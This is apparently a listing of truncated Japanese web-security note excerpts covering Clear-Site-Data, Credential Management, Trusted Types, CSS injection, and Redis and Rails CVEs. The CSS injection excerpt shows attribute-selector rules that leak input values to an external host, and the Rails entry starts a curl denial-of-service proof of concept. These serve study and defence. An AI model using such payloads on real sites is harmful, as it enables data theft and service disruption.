Clear Site Data SPA とかで Cookie とか LocalStorage とか、そういうものを消し忘れてバグる、みたいなのがあるので、ヘッダで消せるようにする提案。 Clear Site Data これで Cookie が全部消える。cache や storage などが指定できる。Chrome M61 で既…

Credential Management Credential Management Level 1 Web サイトが UA に資格情報をリクエストし、UA がそれを使用できるようにする API スキームがダウングレードする場合はクレデンシャルを共有してはいけない(MUST NOT) 呼び出された Origin と Credent…

Trusted Types (TT) とは DOM Based XSS を緩和するための機能。次のような危険な Sink にデータを渡す前に処理する(Trusted Type 型に変換する)ことができる。 <script src> 及び <script> のテキストコンテンツの設定 文字列から HTML を生成するもの innerHTML outerHTML inse…

CSS インジェクションの手法 雑メモです 属性値のリーク 属性セレクタを使う 広く知られている手法。CSS の属性セレクタを使って取得する。 input[value^="a"] { background: url('http://external.host/?c=a'); } input[value^="b"] { background: url('htt…

CVE-2021-29477 Redis <6.2.3, <6.0.13 6.2.3 と 6.0.13 で修正済み STRALGO LCS コマンドで整数オーバーフロー、Remote Code Execution の可能性 https://redis.io/commands/stralgo LCS サブコマンドは longest common subsequence アルゴリズムを実装しま…

Denial of Service in Action Dispatch · CVE-2021-22902 · GitHub Advisory Database · GitHub CVE-2021-22902 Rails ActionPack MIME Type parser DoS PoC: `curl -H 'Accept: text/html ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0;' -X POST…